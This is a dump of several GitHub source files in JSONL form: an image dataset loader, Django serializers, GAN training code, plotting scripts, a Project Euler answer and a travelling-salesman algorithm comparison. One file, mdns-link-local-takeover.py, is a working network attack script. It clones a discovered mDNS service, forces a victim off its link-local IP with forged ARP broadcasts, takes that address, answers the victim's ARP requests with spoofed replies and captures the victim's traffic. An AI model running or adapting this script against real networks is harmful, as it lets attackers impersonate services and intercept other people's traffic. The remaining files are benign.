transforms.Grayscale(num_output_channels=3), # 将图像复制到3个通道以模拟RGB图像\n transforms.Resize((224, 224)), # 修改图像大小为224x224\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n train_dataset = ImageFolder(root=train_path, transform=transform)\n test_dataset = ImageFolder(root=test_path, transform=transform)\n\n train_loader = DataLoader(train_dataset, batch_size=32, shuffle=True)\n test_loader = DataLoader(test_dataset, batch_size=32, shuffle=False)\n\n return train_loader, test_loader","repo_name":"ZenithNUC/MTC2023-train","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24109392513","text":"import logging\n\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.fields import ListField\nfrom rest_framework.serializers import Serializer\n\nfrom API.variables import NUM_ERRORS_LIMIT\nfrom API.objects import Input, Analysis, Alternative, Bcn, Sensitivity\nfrom API.serializers import AnalysisSerializer, AlternativeSerializer, BCNSerializer, SensitivitySerializer, \\\n ScenarioSerializer\n\n\nclass InputSerializer(Serializer):\n \"\"\"\n Object serializer for main input object.\n \"\"\"\n\n analysisObject = AnalysisSerializer(required=True)\n alternativeObjects = ListField(child=AlternativeSerializer(), required=True)\n bcnObjects = ListField(child=BCNSerializer(), required=True)\n sensitivityObjects = ListField(child=SensitivitySerializer(required=False), required=False)\n scenarioObject = ScenarioSerializer(required=False)\n\n def validate(self, data):\n errors = []\n\n study_period = data[\"analysisObject\"][\"studyPeriod\"]\n for bcn in data[\"bcnObjects\"]:\n if \"quantVarValue\" in bcn and bcn[\"quantVarValue\"] is not None:\n quant_var_value = bcn[\"quantVarValue\"]\n\n try:\n assert (isinstance(quant_var_value, list) and len(quant_var_value) == study_period + 1) \\\n or (quant_var_value is not None)\n except:\n errors.append(\n ValidationError(\n f\"The length of quantVarValue for BCN {bcn['bcnID']} is not equal to the study \"\n f\"period {study_period + 1}. Given {quant_var_value}\"\n )\n )\n\n if bcn[\"recurBool\"] is True and bcn[\"recurVarValue\"] is not None:\n recur_var_value = bcn[\"recurVarValue\"]\n\n try:\n assert (isinstance(recur_var_value, list) and len(recur_var_value) == study_period + 1) \\\n or recur_var_value is not None\n except:\n errors.append(\n ValidationError(\n f\"The length of recurVarValue for BCN {bcn['bcnID']} is not equal to the study \"\n f\"period {study_period + 1}. Given {recur_var_value}\"\n )\n )\n\n # Ensure that only one alternative has baselineBool = True.\n try:\n assert len([x for x in data[\"alternativeObjects\"] if x[\"baselineBool\"]]) == 1\n except:\n errors.append(\n ValidationError(\"Only one alternative can be the baseline.\")\n )\n\n # if data['sensitivityObjects'] is not None:\n # # Check bcnID references an existing BCN object\n # bcnIDList = []\n # for bcn in data['bcnObjects']:\n # bcnIDList.append(bcn['bcnID'])\n #\n # for sensitivity_object in data['sensitivityObjects']:\n # if sensitivity_object['bcnID'] not in bcnIDList:\n # errors.append(ValidationError(\"bcnID does not correspond to a valid bcn object\"))\n\n if errors:\n raise(ValidationError(errors[:NUM_ERRORS_LIMIT])) # Throws up to NUM_ERRORS_LIMIT number of errors.\n\n return data\n\n def create(self, validated_data):\n analysis = Analysis(**validated_data.pop(\"analysisObject\"))\n bcn_cache = {}\n for data in validated_data.pop(\"bcnObjects\"):\n bcn_cache[data[\"bcnID\"]] = Bcn(analysis.studyPeriod, **data)\n\n for sens_data in validated_data.get(\"sensitivityObjects\", []):\n if sens_data['globalVarBool'] is False:\n Sensitivity(bcnObj=bcn_cache[sens_data[\"bcnID\"]].bcnName, **sens_data)\n\n return Input(\n analysis,\n [Alternative(**data) for data in validated_data.pop(\"alternativeObjects\")],\n list(bcn_cache.values()),\n [Sensitivity(bcnObj=None, **sens_data) for sens_data in validated_data.get(\"sensitivityObjects\", [])],\n None,\n )\n\n def update(self, instance, validate_data):\n instance.analysis = validate_data.get(\"analysisObject\", instance.analysis)\n instance.alternatives = validate_data.get(\"alternativeObjects\", instance.alternatives)\n instance.bcns = validate_data.get(\"bcnObjects\", instance.bcns)\n instance.sensitivity = validate_data.get(\"sensitivityObjects\", instance.sensitivity)\n instance.scenario = validate_data.get(\"scenarioObject\", instance.scenario)\n\n return instance\n","repo_name":"usnistgov/E3","sub_path":"e3_django/API/serializers/InputSerializer.py","file_name":"InputSerializer.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"43020361594","text":"import scapy.all as scapy\nimport sys\nimport time\nimport re \nfrom zeroconf import ServiceBrowser, Zeroconf, IPVersion, ServiceInfo\nimport socket\n\n\nclass MalListener:\n def __init__(self):\n self.infos = []\n self.ip = \"127.0.0.1\"\n self.names = []\n self.got_one = False\n def remove_service(self, zeroconf, type, name):\n print(\"Service %s removed\" % (name,))\n def add_service(self, zeroconf, type, name): #Pick the first service and copy it, and grab the IP. The basis for this section is mostly copied from Rob Guderian's example\n info = zeroconf.get_service_info(type, name)\n if not self.got_one:\n print(\"Copying: %s\" % (info,))\n zc.register_service(info)\n self.got_one = True\n print(socket.inet_ntoa(info.addresses[0]))\n self.ip = socket.inet_ntoa(info.addresses[0])\n \n def update_service(self, zeroconf, type, name):\n info = zeroconf.get_service_info(type, name)\n \n\n\ndef send_broadcast_request(ip): #Send broadcast ARP request for IP\n pkt = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")/scapy.ARP(op = who, pdst = ip, hwdst = \"00:00:00:00:00:00\", psrc = \"0.0.0.0\")\n print(\"Sending broadcast request\")\n scapy.sendp(pkt, verbose = False, iface=iface_global)\ndef send_broadcast_announce(ip): #Announce IP in an ARP broadcast\n pkt = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")/scapy.ARP(op = who, pdst = ip, hwdst = \"00:00:00:00:00:00\", psrc = ip)\n print(\"Sending broadcast announce\")\n scapy.sendp(pkt, verbose = False, iface=iface_global)\ndef send_reply(ip, mac): #Reply to an arp request from mac for ip\n pkt = scapy.Ether(dst=mac)/scapy.ARP(op = reply, pdst = ip, hwdst = mac, psrc = ip_global)\n scapy.sendp(pkt, verbose = False, iface=iface_global)\ndef send_spoof_reply(ip, req_mac, req_ip): #Print receieved non-arp packets\n pkt = scapy.Ether(dst=req_mac)/scapy.ARP(op = is_at, pdst = req_ip, hwdst = req_mac, psrc = ip)\n scapy.sendp(pkt, verbose = False, iface=iface_global)\ndef handle_new_packet(pkt): #Print receieved non-arp packets\n print(\"received new packet:\")\n print(scapy.ls(pkt))\n return\ndef handle_arp_packet(pkt):\n if pkt[scapy.ARP].op == reply and pkt[scapy.ARP].psrc == ip_global and pkt[scapy.Ether].src != mac_global and pkt[scapy.Ether].src != \"00:00:00:00:00:00\": #If this is the victim, grab their MAC\n global vicmac \n vicmac = pkt[scapy.Ether].src\n print(\"Got victim mac: \", vicmac)\n elif pkt[scapy.ARP].op == who and pkt[scapy.ARP].pdst == ip_global and pkt[scapy.Ether].src != mac_global: #If this is an ARP request for us, reply\n print(\"Got ARP request. Sending reply.\")\n send_reply(pkt[scapy.ARP].psrc, pkt[scapy.Ether].src)\n elif pkt[scapy.ARP].op == who: #If this is an arp request from the victim, tell them that we already have that IP\n ll_match = ll_re.match(str(pkt[scapy.ARP].pdst ))\n if ll_match and pkt[scapy.Ether].src == vicmac:\n print('Got ARP request for ', pkt[scapy.ARP].pdst, \"from \", pkt[scapy.Ether].src, \"/\", pkt[scapy.ARP].psrc, \" replying saying that's us\")\n send_spoof_reply(pkt[scapy.ARP].pdst, pkt[scapy.Ether].src, pkt[scapy.ARP].psrc)\n \n return\n\nll_re = re.compile(r\"^169\\.254\\.\") #Match link-local addresses\nwho=1\nreply=2\nis_at = 2\niface_global = \"\"\nip_global = \"\"\nmac_global = \"\"\nvicmac = \"\"\nif len(sys.argv) == 3:\n zc = Zeroconf(ip_version=IPVersion.V4Only)\n ml = MalListener()\n zone = sys.argv[1]\n browser = ServiceBrowser(zc, zone, ml)\n\n while ml.ip == \"127.0.0.1\": #Wait til we get an IP for our victim\n time.sleep(1)\n iface_global = sys.argv[2]\n ip = ml.ip\n ip_global = ml.ip\n mac_global = scapy.get_if_hwaddr(iface_global)\n s_arp = scapy.AsyncSniffer(filter=\"arp\", iface=iface_global, prn=handle_arp_packet) #Setup ARP handler\n s_arp.start() \n send_broadcast_request(ip) #Force victim off of IP and use it ourselves\n time.sleep(1)\n send_broadcast_request(ip)\n time.sleep(1)\n send_broadcast_request(ip)\n time.sleep(1)\n send_broadcast_announce(ip)\n send_broadcast_announce(ip)\n send_broadcast_announce(ip)\n time.sleep(4)\n s = scapy.AsyncSniffer(filter=\"!arp && dst host %s\" % ip, iface=iface_global, prn=handle_new_packet) #Requires scapy >= 2..4.3 :( - Start general listener\n s.start()\n false = True #Just to bug you...\n while(false):\n try:\n time.sleep(5)\n send_broadcast_announce(ip) #Keep announcing IP in arp. Probably unneccessary \n except KeyboardInterrupt:\n s.stop()\n s_arp.stop()\n sys.exit(0)\n zc.unregister_all_services()\n zc.close()\nelse:\n print(\"Usage: python3 ./mdns-link-local-takeover.py \")\n\n\n\n \n","repo_name":"davidndyck/zeroconf-jiggery-pokery","sub_path":"mdns-link-local-takeover/mdns-link-local-takeover.py","file_name":"mdns-link-local-takeover.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73710100646","text":"from build_model import *\r\nfrom load_data import *\r\nfrom train import *\r\nimport numpy as np\r\nimport time\r\nfrom tensorflow.keras.optimizers import *\r\nimport matplotlib.pyplot as plt\r\n\r\nclass Relight_cycle_pretrain:\r\n def __init__(self):\r\n self.generator = build_relight()\r\n self.discriminator = build_discriminator()\r\n self.opt = Adam(1e-4)\r\n self.style_l = style_loss()\r\n self.path = '/home/pomelo96/Desktop/datasets/Yaleb/train'\r\n self.train_roots, self.train_id, self.train_light, _, _, _ = load_YaleB()\r\n self.input_image_roots, self.reference_image_roots, self.GT_image_roots, self.id_class \\\r\n = set_data_for_cycleGAN(self.train_roots, self.train_light, is_pretrain=True)\r\n self.source_sampling = load_image(get_batch_data(self.input_image_roots, 0, 10))\r\n self.reference_sampling = load_image(get_batch_data(self.reference_image_roots, 0, 10))\r\n self.gt_sampling = load_image(get_batch_data(self.GT_image_roots, 0, 10))\r\n\r\n def gen_train_step(self, source, reference, label):\r\n label = tf.one_hot(label, depth=32)\r\n with tf.GradientTape() as tape:\r\n inputs = tf.concat([source, reference], axis=-1)\r\n gen_img = self.generator.call(inputs)\r\n v_gen, c_gen = self.discriminator.call(gen_img)\r\n loss_cls = classify_loss(label, c_gen)\r\n loss_adv = adversarial_loss(target = True, pred = v_gen)\r\n loss_img = img_loss(source, gen_img)\r\n loss_style = self.style_l.predict_loss(reference, gen_img)\r\n loss_g = tf.reduce_mean([loss_cls, loss_adv, loss_img, loss_style])\r\n grads = tape.gradient(loss_g, self.generator.trainable_variables)\r\n self.opt.apply_gradients(zip(grads, self.generator.trainable_variables))\r\n\r\n return loss_g, loss_adv, loss_img\r\n\r\n def dis_train_step(self, source, reference, label):\r\n label = tf.one_hot(label, depth=32)\r\n with tf.GradientTape() as tape:\r\n inputs = tf.concat([source, reference], axis=-1)\r\n gen_img = self.generator.call(inputs)\r\n v_gen, c_gen = self.discriminator.call(gen_img)\r\n v_real, c_real = self.discriminator.call(tf.cast(source, dtype='float32'))\r\n # loss_classify_gen = classify_loss(label, c_gen)\r\n #This will make generator's predict all become reference and even id will predicted correctly\r\n #AI magic wtf lol lmao kaobei om gash\r\n loss_classify_real = classify_loss(label, c_real)\r\n loss_adv_gen = adversarial_loss(target=False, pred=v_gen)\r\n loss_adv_real = adversarial_loss(target=True, pred=v_real)\r\n\r\n loss_d = tf.reduce_mean([loss_classify_real, loss_adv_gen, loss_adv_real])\r\n grads = tape.gradient(loss_d, self.discriminator.trainable_variables)\r\n self.opt.apply_gradients(zip(grads, self.discriminator.trainable_variables))\r\n return loss_d, np.mean([loss_adv_gen, loss_adv_real]), np.mean([loss_classify_real])\r\n\r\n def pretrain(self, epochs=200, interval=1, batch_size=32, batch_num=341):\r\n tr_L_G_avg = []\r\n tr_L_G_adv_avg = []\r\n tr_L_G_img_avg = []\r\n tr_L_D_avg = []\r\n tr_L_D_adv_avg = []\r\n tr_L_D_cls_avg = []\r\n start = time.time()\r\n for epoch in range(epochs):\r\n ep_start = time.time()\r\n tr_L_G = []\r\n tr_L_G_adv = []\r\n tr_L_G_img = []\r\n tr_L_D = []\r\n tr_L_D_adv = []\r\n tr_L_D_cls = []\r\n\r\n for b in range(batch_num):\r\n source = load_image(get_batch_data(self.input_image_roots, b, batch_size))\r\n reference = load_image(get_batch_data(self.reference_image_roots, b, batch_size))\r\n target = load_image(get_batch_data(self.GT_image_roots, b, batch_size))\r\n label = get_batch_data(self.id_class, b, batch_size)\r\n loss_g, loss_adv_g, loss_img_g = self.gen_train_step(source, reference, label)\r\n tr_L_G.append(loss_g)\r\n tr_L_G_adv.append(loss_adv_g)\r\n tr_L_G_img.append(loss_img_g)\r\n loss_d, loss_adv_d, loss_cls_d = self.dis_train_step(source, reference, label)\r\n tr_L_D.append(loss_d)\r\n tr_L_D_adv.append(loss_adv_d)\r\n tr_L_D_cls.append(loss_cls_d)\r\n tr_L_G_avg.append(np.mean(tr_L_G))\r\n tr_L_G_adv_avg.append(np.mean(tr_L_G_adv))\r\n tr_L_G_img_avg.append(np.mean(tr_L_G_img))\r\n tr_L_D_avg.append(np.mean(tr_L_D))\r\n tr_L_D_adv_avg.append(np.mean(tr_L_D_adv))\r\n tr_L_D_cls_avg.append(np.mean(tr_L_D_cls))\r\n\r\n t_pass = time.time() - start\r\n m_pass, s_pass = divmod(t_pass, 60)\r\n h_pass, m_pass = divmod(m_pass, 60)\r\n print('\\nTime for pass {:<4d}: {:<2d} hour {:<3d} min {:<4.3f} sec'.format(epoch + 1, int(h_pass),\r\n int(m_pass), s_pass))\r\n print('Time for epoch {:<4d}: {:6.3f} sec'.format(epoch + 1, time.time() - ep_start))\r\n print('Train Loss Gen_adv : {:8.5f}'.format(tr_L_G_adv_avg[-1]))\r\n print('Train Loss Dis_adv : {:8.5f}'.format(tr_L_D_adv_avg[-1]))\r\n print('Train Loss Generator : {:8.5f}'.format(tr_L_G_avg[-1]))\r\n print('Train Loss Gen img : {:8.5f}'.format(tr_L_G_img_avg[-1]))\r\n print('Train Loss Discriminator : {:8.5f}'.format(tr_L_D_avg[-1]))\r\n print('Train Loss Dis class : {:8.5f}'.format(tr_L_D_cls_avg[-1]))\r\n\r\n if epoch % interval == 0 or epoch + 1 == epochs:\r\n self.sample_images_pretrain(epoch, self.source_sampling, self.reference_sampling, self.gt_sampling)\r\n self.generator.save_weights('pretrain_weight/generator_pretrained_weights_{}'.format(epoch+1))\r\n self.discriminator.save_weights('pretrain_weight/discriminator_pretrained_weights_{}'.format(epoch+1))\r\n return tr_L_G_avg, tr_L_D_avg, tr_L_G_adv_avg, tr_L_D_adv_avg, tr_L_G_img_avg, tr_L_D_cls_avg\r\n\r\n def sample_images_pretrain(self, epoch, source, reference, gt):\r\n\r\n inputs_ = tf.concat([source, reference], -1)\r\n gen_imgs = self.generator.predict(inputs_)\r\n # Rescale images 0 - 1\r\n source = 0.5 * (source + 1)\r\n reference = 0.5 * (reference + 1)\r\n gt = 0.5 * (gt + 1)\r\n gen_imgs = 0.5 * (gen_imgs + 1)\r\n r, c = 4, 10\r\n fig, axs = plt.subplots(r, c, sharex='col', sharey='row', figsize=(25, 25))\r\n plt.subplots_adjust(hspace=0.2)\r\n cnt = 0\r\n for j in range(c):\r\n axs[0, j].imshow(source[cnt], cmap='gray')\r\n axs[0, j].axis('off')\r\n axs[1, j].imshow(gen_imgs[cnt], cmap='gray')\r\n axs[1, j].axis('off')\r\n axs[2, j].imshow(gt[cnt], cmap='gray')\r\n axs[2, j].axis('off')\r\n axs[3, j].imshow(reference[cnt], cmap='gray')\r\n axs[3, j].axis('off')\r\n\r\n cnt += 1\r\n fig.savefig('pretrain_picture/pretrain_{}.png'.format(epoch+1))\r\n plt.close()\r\n\r\nif __name__ == '__main__':\r\n from tensorflow.compat.v1 import ConfigProto\r\n from tensorflow.compat.v1 import InteractiveSession\r\n import os\r\n\r\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\n os.environ['CUDA_VISIBLE_DEVICES'] = '0,1'\r\n config = ConfigProto()\r\n config.allow_soft_placement = True\r\n config.gpu_options.per_process_gpu_memory_fraction = 0.8\r\n config.gpu_options.allow_growth = True\r\n session = InteractiveSession(config=config)\r\n\r\n relight_cycle = Relight_cycle_pretrain()\r\n # relight_cycle.generator.load_weights('pretrain_weight/generator_pretrained_weights_10')\r\n # relight_cycle.discriminator.load_weights('pretrain_weight/discriminator_pretrained_weights_10')\r\n tr_L_G_avg, tr_L_D_avg, tr_L_G_adv_avg, tr_L_D_adv_avg, tr_L_G_img_avg, tr_L_D_cls_avg = relight_cycle.pretrain(epochs=20, interval=1)\r\n\r\n plt.plot(tr_L_G_avg)\r\n plt.plot(tr_L_D_avg)\r\n plt.legend(['Generator', 'Discriminator'])\r\n plt.title('Pretrain Generator Loss')\r\n plt.savefig('pretrain_picture/pretrain_loss.jpg')\r\n plt.close()\r\n\r\n plt.plot(tr_L_G_adv_avg)\r\n plt.plot(tr_L_D_adv_avg)\r\n plt.legend(['Generator', 'Discriminator'])\r\n plt.title('Pretrain Adversarial Loss')\r\n plt.savefig('pretrain_picture/pretrain_Adversarial_loss.jpg')\r\n plt.close()\r\n\r\n plt.plot(tr_L_G_img_avg)\r\n plt.legend(['Image loss'])\r\n plt.savefig('pretrain_picture/pretrain_imgae_loss.jpg')\r\n plt.close()\r\n\r\n plt.plot(tr_L_D_cls_avg)\r\n plt.legend(['Classify loss'])\r\n plt.savefig('pretrain_picture/pretrain_classify_loss.jpg')\r\n plt.close()\r\n","repo_name":"isaacchen96/RelightGAN","sub_path":"pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":8853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74749480164","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 30 14:56:25 2020\n\n@author: Eduin Hernandez\n\"\"\"\n\nimport shelve\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#-----------------------------------------------------------------------------\nfolder_path = './Accuracy/'\nsuffix = '.out'\n\nprefix = 'shelve_accuracy_mnist_dense_'\ntail = ''\n\ntmax = '1'\nepochs_num = 3\n\n'UEP Class Num'\nclass_num = 3\n\n'Coding Type'\noperator_str = ['centralized',\n 'uncoded',\n 'now',\n 'ew',\n 'block_reps']\n\n'Plotting Variables'\n\nstep = 100\nlegend = ['Paramter Server',\n 'Uncoded',\n 'NOW - UEP - 3 Classes',\n 'EW - UEP - 3 Classes',\n 'Block Reps']\n\next_ind = [500, 1000, 1500, 2000] #specific indexes to extract\n\n\n#-----------------------------------------------------------------------------\nwait_str = '_tmax' + tmax\n\ntitle = 'Mnist Classification Accuracy\\n Epochs = ' + str(epochs_num) + ', Tmax = ' + tmax\n\nbase_str = 'centralized'\nuep_str = 'now_ew'\n\n\nacc = {}\nfor op, ind in zip(operator_str, range(len(operator_str))):\n if(op == base_str):\n filename_load = prefix + op + str(epochs_num)\n elif(op in uep_str):\n filename_load = prefix + op + str(epochs_num) + '_class' + str(class_num) + wait_str + tail\n else:\n filename_load = prefix + op + str(epochs_num) + wait_str + tail\n \n my_shelf = shelve.open(folder_path + filename_load + suffix)\n acc[ind] = my_shelf['data']['acc'].mean(axis=0)\n my_shelf.close()\n \nplt.close('all')\nx = np.arange(50, 937*epochs_num, step)\nx = np.concatenate((np.array([0]),x, np.array([937*epochs_num-1])))\nacc_tilde = np.zeros((len(operator_str), x.size))\nacc_ext = np.zeros((len(operator_str), len(ext_ind)))\nfor i0 in range(len(operator_str)):\n plt.plot(x, acc[i0][x])\n acc_tilde[i0] = acc[i0][x]\n acc_ext[i0] = acc[i0][ext_ind]\n\nacc_tilde = acc_tilde.T\nacc_ext = acc_ext.T\n\n# plt.figure()\n# x = np.arange(0, 937*epochs_num)\n# for i0 in range(len(operator_str)):\n# a = acc[i0][x].reshape(3,-1).mean(axis=1)\n# plt.plot(np.arange(3), a)\n\n\nplt.title(title)\nplt.grid()\n# plt.xlabel('Epoch')\nplt.xlabel('minibatch')\nplt.ylabel('accuracy')\nplt.legend(legend, loc = 'lower right')\n\n# np.savetxt('D:/Dewen/text.txt', (x,y), fmt='%.5')\n","repo_name":"HernandezEduin/UEP-Straggler-Mitigation","sub_path":"dnn/accuracy_extraction_mnist_dense_plot.py","file_name":"accuracy_extraction_mnist_dense_plot.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"29791716318","text":"def multiples(n):\n \"\"\" \n Determine if the multiple is three or five?\n\n Args:\n n (int): Input integer\n\n Returns:\n boolean: If the number is divisible by 3 or 5, it returns True, otherwise it returns False.\n \"\"\"\n if n % 3 == 0 or n % 5 == 0:\n return True\n return False\n\nsum = 0\nfor i in range(1, 1000):\n if multiples(i):\n sum += i\n\nprint(sum)","repo_name":"web-py/Euler-Project-Python","sub_path":"01-Multiples_of_3_or_5.py","file_name":"01-Multiples_of_3_or_5.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20104805828","text":"from random import randint,shuffle\nfrom time import time\n#ACO3 for multiple methods and show the curves\n\ndef distance(a,b):\n return sum([(a[i]-b[i])**2 for i in range(len(a))])**0.5\n\ndef pathdistance(path):\n d=0\n for i in range(len(path)-1):\n d+=e[path[i]][path[i+1]]\n return d\n\n# def validpath(path):\n# if sorted(path)==[0]+[i for i in range(n)]:\n# print(True)\n# else:\n# print(False)\n\ndef weightedrandom(weights,num):\n if min(weights):\n mul=10000/min(weights)#let minimum weight to be 10000\n else:\n mul=1000000000000\n newweights=[i*mul for i in weights]\n result=[]\n total=int(sum(newweights))\n for i in range(num):\n r=randint(0,total)\n index=0\n for weight in newweights:\n r-=weight\n if r<=0:\n result.append(index)\n break\n index+=1\n else:\n result.append(len(weights)-1)\n return result\n \n#input: number of vertex, range of dimensions in 2D array, minimum interval between any two vertices\ndef randomedge(n,ranges,interval):\n global v,e,availablelist\n v=[]#vertices, first one would be the ant net\n for i in range(n):\n while 1:\n coordinate=[]\n for i in range(len(ranges)):\n coordinate.append(randint(ranges[i][0],ranges[i][1]))\n num=0\n for vertex in v:\n if distance(coordinate,vertex)j:\n tau[i][j]=tau[j][i]=(1-rou)*tau[i][j]+tauupdate[i][j]+tauupdate[j][i]\n tau[i][i]=0\n tau[i][i]=sum(tau[i])/(n-1)#remove diagonal\n historydistance.append(generationbestdistance)\n if generationbestdistance1:\n d0=e[path[i]][path[i+1]]+e[path[j]][path[j+1]]\n d1=e[path[i]][path[j]]+e[path[i+1]][path[j+1]]\n if d11 and k-j>1:\n d0=e[path[i]][path[i+1]]+e[path[j]][path[j+1]]+e[path[k]][path[k+1]]\n d1=e[path[i]][path[j+1]]+e[path[j]][path[k+1]]+e[path[k]][path[i+1]]\n d2=e[path[i]][path[k]]+e[path[i+1]][path[j+1]]+e[path[j]][path[k+1]]\n if d10 for random\n#pheromone attractivity\nalpha=1\n#distance attractivity\nbeta=7\n\nrandomedge(n,[[0,1000],[0,1000]],10)#randomedge(n,[[0,1000],[0,1000],[0,10000]],10) for 3 d\nprint(\"vertex number\",n)\n\n'''\n#adjust alpha and beta of ACO\nimport matplotlib.pyplot as plt\nprint(\"ACO, alpha=1~3, beta=1~8\")\nacoresults=[[0 for i in range(10)] for i in range(10)]\nfor alpha in range(1,4):\n for beta in range(1,9):\n rou=1/n#pheromone decrease every generation\n q=n#amount of pheromone one ant have\n initialPheromone=antnum*q/n/(n-1)\n ACOresult=ACO(v,e,50,250,rou,q,initialPheromone,alpha,beta)\n print(alpha,beta,ACOresult[1],ACOresult[2],\"s\")\n acoresults[alpha][beta]=ACOresult\nfor b in range(1,9):\n plt.subplot(2,4,b)\n for a in range(1,4):\n print(\"{:<8d}\".format(int(acoresults[a][b][1])),end=\"\")\n colors=[\"\",\"r\",\"g\",\"b\"]\n plt.plot(acoresults[a][b][4],colors[a])\n plt.title(f\"b={b}\")\n print()\n'''\n\n'''\n#adjust rou\nimport matplotlib.pyplot as plt\nfor r in range(1,21,2):\n l=ACO(v,e,50,250,r*rou,q,initialPheromone,alpha,beta)[1]\n print(r,l)\n plt.plot(r,l,\"k.\")\nplt.show()\n'''\n\n'''\nrelationship between parameter and run time\nt1=time()\nn=100\nprint(n)\nrandomedge(n,2,[[0,1000],[0,1000]],10)\nACO(v,e,10,10,0.1,10,1,1,1)\nt2=time()\nn=200\nprint(n)\nrandomedge(n,2,[[0,1000],[0,1000]],10)\nACO(v,e,10,10,0.1,10,1,1,1)\nt3=time()\nn=400\nprint(n)\nrandomedge(n,2,[[0,1000],[0,1000]],10)\nACO(v,e,10,10,0.1,10,1,1,1)\nt4=time()\nprint(t2-t1,t3-t2,t4-t3)\n'''\n\n\n\nresults=[]\nstrings=[\"brute force\", \"greedy\", \"Prim\", \"Kruskal\", \"2-opt\", \"3-opt\", \"Genetic algorithm\", \"ACO\"]\nfunctions=[random,greedy,Prim,Kruskal,twoopt,threeopt,geneticalgorithm,ACO]\n#n=128\ninputs=[[1500000],#random\n [],\n [],\n [],\n [int(400000/n)],#2-opt\n [int(550000/n**2)],#3-opt\n [100,30000,1,67],#GA #60000 when n=512\n [int(3000/n),1000,rou,q,initialPheromone,alpha,beta]#ACO\n ]\nfor i in range(len(functions)):\n f=functions[i]\n print(strings[i],[name for name in globals() if globals()[name] is f][0])\n result=f(v,e,*inputs[i])\n results.append(result)\n print(result[1],result[2],\"s\")\n \n'''\nprint(strings[0])\nresults.append(random(v,e,1000000))\nprint(results[0][1],results[0][2],\"s\")\nprint(strings[1])\nresults.append(greedy(v,e))\nprint(results[1][1],results[1][2],\"s\")\nprint(strings[2])\nresults.append(Prim(v,e))\nprint(results[2][1],results[2][2],\"s\")\nprint(strings[3])\nresults.append(Kruskal(v,e))\nprint(results[3][1],results[3][2],\"s\")\nprint(strings[4])\nresults.append(twoopt(v,e,int(10000/n)))\nprint(results[4][1],results[4][2],\"s\")\nprint(strings[5])\nresults.append(threeopt(v,e,int(20000/n**2)))\nprint(results[5][1],results[5][2],\"s\")\nprint(strings[6])\nresults.append(geneticalgorithm(v,e,100,240*n,1,67))\nprint(results[6][1],results[6][2],\"s\")\nprint(strings[7])\nresults.append(ACO(v,e,int(6000/n),600,rou,q,initialPheromone,alpha,beta))\nprint(results[7][1],results[7][2],\"s\")\n'''\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n#brute force, greedy, Prim, Kruskal, 2-opt, 3-opt, Genetic algorithm, ACO\nfig, axs = plt.subplots(nrows=3, ncols=3, constrained_layout=True)\nfor i in range(3):\n for j in range(3):\n \n plt.subplot(3,3,3*i+j+1)\n if i==2 and j==2:\n break\n plt.scatter(np.array([vx[0] for vx in v]),np.array([vy[1] for vy in v]),s=2,c='#000000')\n \n plt.plot(np.array([v[vx][0] for vx in results[3*i+j][0]]),np.array([v[vy][1] for vy in results[3*i+j][0]]))\n plt.title(strings[3*i+j])\n plt.text(0,1.05*1000,str(round(results[3*i+j][1],6)))\n\n\ncolors=[\"k-\",\"\",\"\",\"\",\"r-\",\"y-\",\"g-\",\"b-\"]\nfor i in range(8):\n print(i,len(results[i][3]),len(results[i][4]))\n plt.plot(results[i][3],results[i][4],colors[i])\n","repo_name":"rhit-caiy/ACO","sub_path":"ACO3.py","file_name":"ACO3.py","file_ext":"py","file_size_in_byte":16775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40577056210","text":"#!/usr/bin/env python\n\n\"\"\"\nsetup.py file for Python wrapping of a C++ network data structure\n\"\"\"\n\nfrom distutils.core import setup, Extension\n\n\nexample_module = Extension('_eventpy',\n sources=['eventpy_wrap.cxx'],\n )\n\n# sources=['eventpy_wrap.cxx', 'eventList.h'],\nsetup (name = 'eventpy',\n version = '0.1',\n author = \"Mikko Kivela\",\n description = \"\"\"Python wrapping of a C++ event list data structure.\"\"\",\n ext_modules = [example_module],\n py_modules = [\"eventpy\"],\n )\n","repo_name":"jordan0102/temporal_percolation","sub_path":"event-based-networks/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18125382604","text":"from rest_framework import serializers\n\nfrom quotes.models import Quote\n\n\nclass GetQuotesSerializer(serializers.ModelSerializer):\n class Meta:\n model = Quote\n fields = ['quote_number', 'effective_date', 'has_previous_cancelled_policy', 'is_property_owner', 'name',\n 'property_address', 'property_state', 'zip_code', 'base_premium', 'total_term_premium',\n 'monthly_term_premium', 'total_additional_fees', 'total_monthly_fees', 'total_discounts',\n 'total_monthly_discounts']\n\n\nclass PostQuotesSerializer(serializers.ModelSerializer):\n class Meta:\n model = Quote\n fields = ['is_property_owner', 'name', 'property_address', 'property_state', 'zip_code']\n","repo_name":"sherdwhite/backend_challenge","sub_path":"quotes/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31667671204","text":"\"\"\"Utilities to store the dataset as 